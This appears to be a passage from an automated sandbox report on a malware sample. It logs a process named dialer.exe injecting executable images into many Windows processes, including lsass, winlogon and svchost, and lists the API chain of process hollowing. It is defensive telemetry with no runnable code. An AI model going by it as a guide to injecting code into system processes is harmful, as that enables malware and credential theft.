        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 19E27BC0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\explorer.exe base: 8740000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF64520000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 265CF960000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 223DA540000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 22638E00000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 1EC097C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\conhost.exe base: 1CFE9AB0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 250FB0F0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23523E30000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B5CB5E0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1E53D990000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DAF9E60000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E6DD840000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E6DDE20000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Code function: 11_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,11_2_0000000140001C88
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\winlogon.exe EIP: DC61273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\lsass.exe EIP: C0AB273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 612D273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: DC67273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: C0B1273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6133273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: AEDC273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 8799273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5377273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D53273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 67D273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5B37273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: EBFD273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5904273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: A9E7273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 7316273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 4E86273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 473C273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6F9D273C
        Source: C:\Windows\System32\dialer.exe Thread created: C:\Windows\System32\svchost.exe EIP: 83BC273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: D3F7273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: A415273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: BDF3273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: C026273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: C9F3273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 645B273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 7B2A273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 4F6273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 2AB4273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 4ADB273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 199273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 25DA273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: F535273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: F0D6273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: FFB273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: C257273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8B94273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6691273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 13EF273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8D57273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 69B4273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: CC74273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 5DA7273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 199D273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: F389273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 3B8273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 40E4273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: A653273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 27BC273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 7B15273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 621A273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 2F48273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8B4B273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 683D273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 874273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 2E26273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6C5E273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: D593273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: FC65273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 7874273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 33B4273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 8D0A273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: AB4C273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 2A64273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6CF3273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 6452273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 4935273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 60DA273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 5E7B273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 2F7C273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: E815273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 5234273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 9DA9273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 602E273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: CF96273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: DA54273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 38E0273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 97C273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: E9AB273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: FB0F273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 23E3273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: CB5E273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: 3D99273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: F9E6273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: DD84273C
        Source: C:\Windows\System32\dialer.exe Thread created: unknown EIP: DDE2273C
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAED90000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC670000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0B10000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2A661330000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B370000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108B940000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29166910000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 8740000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF64520000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 265CF960000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 223DA540000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22638E00000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1EC097C0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1CFE9AB0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 250FB0F0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23523E30000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1B5CB5E0000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E53D990000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DAF9E60000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E6DD840000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E6DDE20000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: PID: 2580 base: 8740000 value: 4DJump to behavior
        Source: C:\Users\user\Desktop\loader.exeThread register set: target process: 6952Jump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeThread register set: target process: 7648Jump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeThread register set: target process: 7712Jump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeThread register set: target process: 7784Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAED90000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B3B0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC670000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0B10000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A661330000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDC0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B370000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5645B0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000Jump to behavior
        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2108B940000Jump to behavior
